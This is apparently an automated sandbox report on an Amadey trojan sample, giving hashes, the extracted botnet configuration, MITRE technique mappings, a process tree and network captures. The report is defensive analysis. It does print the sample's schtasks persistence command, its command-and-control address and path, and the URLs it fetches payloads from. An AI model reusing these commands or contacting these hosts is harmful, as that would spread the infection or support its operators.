amadey | 7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df

Analysis

max time kernel
142s
max time network
144s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
01/09/2024, 13:35 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe
Size

44KB
MD5

9d78ab0da1948de3977123755ef0fe7c
SHA1

b000aa9b5df426225a02f208b78416cc2f8dab86
SHA256

7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df
SHA512

9576fdbeb8ad20a8ebcfc3121247f4e70a7e9240bea4122f471b813ea321566e45bc4db86fe5bed11ce17bbe14dc68cb82f29fe9df0cee78f0f6f90b5c756bf1
SSDEEP

768:BMbuPxqzgDwNIH/335cJX2om4VQRIEvmg5+FOKo5O:B1xv/H/335C2ozVQRItgMF4O

Score

10^/10

amadey 1176f2 discovery persistence trojan

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

1176f2

http://185.215.113.19

Attributes

install_dir
417fd29867
install_file
ednfoki.exe
strings_key
183201dc3defc4394182b4bff63c4065
url_paths
/CoreOPT/index.php

rc4.plain

1
c1ec479e5342a25940592acf24703eb2

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Downloads MZ/PE file

Executes dropped EXE 4 IoCs

pid	Process
3384	ovrflw.exe
1416	mswabnet.exe
3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe
4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Network Agent = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft Network Agent\\mswabnet.exe\""	ovrflw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df = "C:\\Users\\Admin\\Pictures\\Lighter Tech\\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe"	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df = "C:\\Users\\Admin\\Pictures\\Lighter Tech\\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe"	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3761892313-3378554128-2287991803-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df = "C:\\Users\\Admin\\Pictures\\Lighter Tech\\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe"	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1984 set thread context of 1960	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	83
PID 3908 set thread context of 2132	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	90
PID 4708 set thread context of 3372	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	95

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AppLaunch.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4136	schtasks.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe
4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe
Token: SeDebugPrivilege	3384	ovrflw.exe
Token: SeDebugPrivilege	1416	mswabnet.exe
Token: SeDebugPrivilege	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe
Token: SeDebugPrivilege	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 1984 wrote to memory of 1960	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	83
PID 1984 wrote to memory of 1960	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	83
PID 1984 wrote to memory of 1960	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	83
PID 1984 wrote to memory of 1960	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	83
PID 1984 wrote to memory of 1960	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	83
PID 1984 wrote to memory of 1960	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	83
PID 1984 wrote to memory of 1960	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	83
PID 1984 wrote to memory of 1960	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	83
PID 1984 wrote to memory of 1960	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	83
PID 1984 wrote to memory of 1960	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	83
PID 1960 wrote to memory of 3384	1960	AppLaunch.exe	84
PID 1960 wrote to memory of 3384	1960	AppLaunch.exe	84
PID 3384 wrote to memory of 1416	3384	ovrflw.exe	85
PID 3384 wrote to memory of 1416	3384	ovrflw.exe	85
PID 1984 wrote to memory of 2968	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	86
PID 1984 wrote to memory of 2968	1984	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	86
PID 2968 wrote to memory of 4136	2968	cmd.exe	88
PID 2968 wrote to memory of 4136	2968	cmd.exe	88
PID 3908 wrote to memory of 2132	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	90
PID 3908 wrote to memory of 2132	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	90
PID 3908 wrote to memory of 2132	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	90
PID 3908 wrote to memory of 2132	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	90
PID 3908 wrote to memory of 2132	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	90
PID 3908 wrote to memory of 2132	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	90
PID 3908 wrote to memory of 2132	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	90
PID 3908 wrote to memory of 2132	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	90
PID 3908 wrote to memory of 2132	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	90
PID 3908 wrote to memory of 2132	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	90
PID 3908 wrote to memory of 3464	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	91
PID 3908 wrote to memory of 3464	3908	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	91
PID 4708 wrote to memory of 2424	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	94
PID 4708 wrote to memory of 2424	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	94
PID 4708 wrote to memory of 2424	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	94
PID 4708 wrote to memory of 3372	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	95
PID 4708 wrote to memory of 3372	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	95
PID 4708 wrote to memory of 3372	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	95
PID 4708 wrote to memory of 3372	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	95
PID 4708 wrote to memory of 3372	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	95
PID 4708 wrote to memory of 3372	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	95
PID 4708 wrote to memory of 3372	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	95
PID 4708 wrote to memory of 3372	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	95
PID 4708 wrote to memory of 3372	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	95
PID 4708 wrote to memory of 3372	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	95
PID 4708 wrote to memory of 3724	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	96
PID 4708 wrote to memory of 3724	4708	7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe	96

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe
"C:\Users\Admin\AppData\Local\Temp\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe"
1⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1984
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1960
- - C:\Users\Admin\AppData\Local\Temp\1000279001\ovrflw.exe
    "C:\Users\Admin\AppData\Local\Temp\1000279001\ovrflw.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3384
  - - C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe" "C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df" /TR "C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe" /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Windows\system32\schtasks.exe
    schtasks /Create /SC MINUTE /MO 1 /TN "7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df" /TR "C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe" /F
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4136

C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe
"C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3908
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:2132
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe" "C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df" /TR "C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe" /F
  2⤵
  PID:3464

C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe
"C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4708
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:2424
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:3372
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe" "C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df" /TR "C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe" /F
  2⤵
  PID:3724

Network

GET

http://185.215.113.19/ProlongedPortable.dll

7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe

Remote address:

185.215.113.19:80

Request

GET /ProlongedPortable.dll HTTP/1.1
Host: 185.215.113.19
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 13:35:12 GMT
Content-Type: application/octet-stream
Content-Length: 514560
Last-Modified: Sun, 01 Sep 2024 13:24:10 GMT
Connection: keep-alive
ETag: "66d46afa-7da00"
Accept-Ranges: bytes
DNS

19.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

19.113.215.185.in-addr.arpa

IN PTR

Response
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

16.113.215.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.113.215.185.in-addr.arpa

IN PTR

Response
DNS

114.158.208.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

114.158.208.185.in-addr.arpa

IN PTR

Response
DNS

nexusrules.officeapps.live.com

Remote address:

8.8.8.8:53

Request

nexusrules.officeapps.live.com

IN A

Response

nexusrules.officeapps.live.com

IN CNAME

prod.nexusrules.live.com.akadns.net

prod.nexusrules.live.com.akadns.net

IN A

52.111.227.13
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR

Response
DNS

13.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.227.111.52.in-addr.arpa

IN PTR
POST

http://185.215.113.19/CoreOPT/index.php?scr=1

AppLaunch.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----ODUxOTA=
Host: 185.215.113.19
Content-Length: 85342
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 13:35:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

AppLaunch.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 13:35:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

AppLaunch.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 13:35:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://185.215.113.19/CoreOPT/index.php

AppLaunch.exe

Remote address:

185.215.113.19:80

Request

POST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.19
Content-Length: 156
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 13:35:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://185.215.113.16/inc/ovrflw.exe

AppLaunch.exe

Remote address:

185.215.113.16:80

Request

GET /inc/ovrflw.exe HTTP/1.1
Host: 185.215.113.16

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 13:35:24 GMT
Content-Type: application/octet-stream
Content-Length: 1422336
Last-Modified: Sun, 01 Sep 2024 12:09:44 GMT
Connection: keep-alive
ETag: "66d45988-15b400"
Accept-Ranges: bytes
GET

http://185.215.113.19/ProlongedPortable.dll

7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe

Remote address:

185.215.113.19:80

Request

GET /ProlongedPortable.dll HTTP/1.1
Host: 185.215.113.19
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 13:36:02 GMT
Content-Type: application/octet-stream
Content-Length: 514560
Last-Modified: Sun, 01 Sep 2024 13:24:10 GMT
Connection: keep-alive
ETag: "66d46afa-7da00"
Accept-Ranges: bytes
GET

http://185.215.113.19/ProlongedPortable.dll

7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe

Remote address:

185.215.113.19:80

Request

GET /ProlongedPortable.dll HTTP/1.1
Host: 185.215.113.19
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 01 Sep 2024 13:37:04 GMT
Content-Type: application/octet-stream
Content-Length: 514560
Last-Modified: Sun, 01 Sep 2024 13:24:10 GMT
Connection: keep-alive
ETag: "66d46afa-7da00"
Accept-Ranges: bytes

185.215.113.19:80

http://185.215.113.19/ProlongedPortable.dll

http

7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe

12.0kB
530.1kB
246
382

HTTP Request

GET http://185.215.113.19/ProlongedPortable.dll

HTTP Response

200
185.215.113.19:80

http://185.215.113.19/CoreOPT/index.php

http

AppLaunch.exe

244.8kB
44.6kB
3637
662

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php?scr=1

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200
185.215.113.19:80

http://185.215.113.19/CoreOPT/index.php

http

AppLaunch.exe

1.1kB
725 B
14
6

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200

HTTP Request

POST http://185.215.113.19/CoreOPT/index.php

HTTP Response

200
185.215.113.16:80

http://185.215.113.16/inc/ovrflw.exe

http

AppLaunch.exe

53.3kB
1.5MB
1060
1052

HTTP Request

GET http://185.215.113.16/inc/ovrflw.exe

HTTP Response

200
185.208.158.114:1256

mswabnet.exe

585 B
668 B
12
11
185.215.113.19:80

http://185.215.113.19/ProlongedPortable.dll

http

7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe

11.5kB
530.1kB
227
382

HTTP Request

GET http://185.215.113.19/ProlongedPortable.dll

HTTP Response

200
185.215.113.19:80

http://185.215.113.19/ProlongedPortable.dll

http

7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe

15.5kB
530.2kB
293
383

HTTP Request

GET http://185.215.113.19/ProlongedPortable.dll

HTTP Response

200

8.8.8.8:53

19.113.215.185.in-addr.arpa

dns

506 B
804 B
7
6

DNS Request

19.113.215.185.in-addr.arpa

DNS Request

8.8.8.8.in-addr.arpa

DNS Request

16.113.215.185.in-addr.arpa

DNS Request

114.158.208.185.in-addr.arpa

DNS Request

nexusrules.officeapps.live.com

DNS Response

52.111.227.13

DNS Request

13.227.111.52.in-addr.arpa

DNS Request

13.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1000279001\ovrflw.exe

Filesize
1.4MB

MD5
3adfc7cf1e296c6fb703991c5233721d

SHA1
fddd2877ce7952b91c3f841ca353235d6d8eea67

SHA256
6bc23179d079d220337ede270113d4a474b549f5f0c7fd57f3d33d318f7ae471

SHA512
5136525626c3021baf8d35be0d76473cc03bfe2433682d613650b8e4bb444f767d2d14ac0070ce46c4c220e0a71a8f2e789e4e684e2042bd78b60f68f35a652b

Download Submit
C:\Users\Admin\AppData\Local\Temp\761892313337

Filesize
83KB

MD5
428b88d3055b1f3ef19e156d1c76b405

SHA1
645949baf61b796769d012bb8ccc3e99b06984b0

SHA256
290cb1049f795d9ef02a2df6f910b6476ee4d0b870265b6461f9eb8074f650de

SHA512
ca5707f9e9aaada9cffac5d392777b9ae6800cf9ed9701cc2a18884d69fbfdee65e1fd09938597400b07912c279d420e309adbcf70eb335b808d780ba8bee71e

Download Submit
C:\Users\Admin\Pictures\Lighter Tech\7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df.exe

Filesize
44KB

MD5
9d78ab0da1948de3977123755ef0fe7c

SHA1
b000aa9b5df426225a02f208b78416cc2f8dab86

SHA256
7d9733030e72c5ed1016ff372ffde715883bb827391f50fdb9cd7f000f7a67df

SHA512
9576fdbeb8ad20a8ebcfc3121247f4e70a7e9240bea4122f471b813ea321566e45bc4db86fe5bed11ce17bbe14dc68cb82f29fe9df0cee78f0f6f90b5c756bf1

Download Submit
memory/1960-31-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/1960-12-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/1960-40-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/1960-11-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/1960-10-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/1960-7-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/1960-9-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/1984-5-0x000000001C4E0000-0x000000001C564000-memory.dmp

Filesize
528KB

Download
memory/1984-6-0x000000001C6A0000-0x000000001C710000-memory.dmp

Filesize
448KB

Download
memory/1984-4-0x00007FFD12A40000-0x00007FFD13502000-memory.dmp

Filesize
10.8MB

Download
memory/1984-3-0x00007FFD12A43000-0x00007FFD12A45000-memory.dmp

Filesize
8KB

Download
memory/1984-2-0x00007FFD12A40000-0x00007FFD13502000-memory.dmp

Filesize
10.8MB

Download
memory/1984-0-0x00007FFD12A43000-0x00007FFD12A45000-memory.dmp

Filesize
8KB

Download
memory/1984-8-0x00007FFD12A40000-0x00007FFD13502000-memory.dmp

Filesize
10.8MB

Download
memory/1984-55-0x00007FFD12A40000-0x00007FFD13502000-memory.dmp

Filesize
10.8MB

Download
memory/1984-58-0x00007FFD12A40000-0x00007FFD13502000-memory.dmp

Filesize
10.8MB

Download
memory/1984-1-0x0000000000E20000-0x0000000000E32000-memory.dmp

Filesize
72KB

Download
memory/2132-62-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/3372-65-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/3384-43-0x0000000000600000-0x0000000000762000-memory.dmp

Filesize
1.4MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.